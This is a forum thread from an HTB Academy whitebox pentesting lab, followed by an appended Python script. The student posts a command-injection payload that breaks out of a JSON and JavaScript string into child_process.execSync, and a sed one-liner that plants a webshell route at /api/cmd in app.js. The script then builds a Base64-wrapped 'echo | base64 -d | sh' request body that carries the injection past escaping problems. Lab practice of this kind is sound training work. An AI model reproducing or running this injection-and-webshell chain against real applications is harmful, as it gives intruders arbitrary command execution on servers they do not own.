Intro to whitebox pentesting - Command Execution

Hello,

I’m looking for help with the Command Execution portion of this module. The task is to write a new API route into the app.js file to create a webshell.

I cannot for the life of me get this working at all locally. Without using the API, I can confirm this command works to rewrite the app.js:

sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});' src/app.js

Afterwards I can run a GET request to the endpoint to read files.

Whenever I try to do it in the app, all I get are syntax errors. I’ve tried escaping, modifying the syntax, using other ways, but I can’t get it to work.

This command injection gives me this feedback:

{"text":"'}) + require('child_process').execSync('sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});'\" src/app.js')//

}

{"message":"Bad escaped character in JSON at position 62 (line 1 column 63)"}

Sometimes, I can get the API to give me a normal response, but then the file isn’t overwritten at all. Very lost here.

Hey,

DM me, I remember it pretty well and it was hard.
This is due to syntax most of the time.
It’s easier to do it with a Python script, as the command won’t get the syntax messed up.

Just sharing that using Python for syntax highlighting was the way to go! Solved it now :smiley:


I have solved the exercise. I played with Burp instead of curl. I converted the sed command and the following payload provided by HTB Academy to Base64 to avoid problems with escaping quotes and other special characters:

 app.get("/api/cmd", (req, res) => { const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd); });

If anyone needs help, you can ask for it.
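The two problems this thread runs into, a JSON body that breaks on the backslash in `17i\app.get(...)` (the "Bad escaped character" error in the first post) and quotes that have to survive JSON, a JavaScript string literal and the shell at once, are both sidestepped by the Base64 trick the later replies describe. The script below is an added example, not code from the thread or from HTB Academy: it builds the sed one-liner from the first post, shows why pasting it straight into a hand-written JSON body fails, and then wraps it as `echo <base64> | base64 -d | sh` so the injected fragment contains nothing JSON or the shell need to escape. It assumes the request shape the first post implies (a JSON body with a `text` field and the `'}) + require('child_process').execSync('...')//` wrapper taken from that post), the line number and `src/app.js` path from the thread, and that the target has `sh` and a GNU-style `base64 -d` available; it never contacts a server, so it can be run offline to inspect the body before sending it with curl or Burp.

```python
import base64
import json
import re

# Route from the thread, inserted before line 17 of src/app.js to create the webshell.
WEBSHELL_ROUTE = (
    'app.get("/api/cmd", (req, res) => {'
    'const cmd = require("child_process").execSync(req.query.cmd).toString(); '
    'res.send(cmd);});'
)

# Injection wrapper copied from the first post's payload (assumed to match the app):
# it closes the string and object the server builds around `text`, appends an
# execSync call, and comments out whatever follows.
PREFIX = "'}) + require('child_process').execSync('"
SUFFIX = "')//"


def sed_insert_command(line_no=17, route=WEBSHELL_ROUTE, path="src/app.js"):
    """The sed one-liner from the thread. GNU sed accepts the `Ni\\text` form
    on a single line; the route contains no single quotes, so quoting the whole
    script with '...' is safe for the shell."""
    return f"sed -i '{line_no}i\\{route}' {path}"


def naive_payload(shell_cmd):
    """Paste the raw command into a hand-built JSON body, as the first post did.
    The `\\a` in `17i\\app.get` is not a valid JSON escape, and the double quotes
    inside the route would terminate the JSON string even if it were."""
    return '{"text":"' + PREFIX + shell_cmd + SUFFIX + '"}'


def b64_payload(shell_cmd):
    """Base64-wrap the command so the injected fragment only contains characters
    that need no escaping in JSON, in a JS single-quoted string, or in sh, then
    let json.dumps produce the body instead of writing the JSON by hand."""
    encoded = base64.b64encode(shell_cmd.encode()).decode()
    injected = PREFIX + f"echo {encoded} | base64 -d | sh" + SUFFIX
    return json.dumps({"text": injected})


def json_parse_error(body):
    """Return the JSON parser's error message, or None if the body is valid."""
    try:
        json.loads(body)
    except json.JSONDecodeError as exc:
        return exc.msg
    return None


def injected_fragment(body):
    """The `text` value the server would receive from a valid body."""
    return json.loads(body)["text"]


def decode_injected_command(body):
    """Recover the command `sh` would run on the target from a Base64 body,
    i.e. what `base64 -d` hands to the shell."""
    match = re.search(r"echo ([A-Za-z0-9+/=]+) \| base64 -d \| sh",
                      injected_fragment(body))
    return base64.b64decode(match.group(1)).decode()


if __name__ == "__main__":
    cmd = sed_insert_command()
    print("naive body fails with:", json_parse_error(naive_payload(cmd)))
    body = b64_payload(cmd)
    print("send this body:", body)
    print("target will run:", decode_injected_command(body))
```

Once the route is in place, the webshell is reached the same way the first post describes, with a GET to `/api/cmd?cmd=...`; URL-encode that command too, since it goes through a query string rather than JSON.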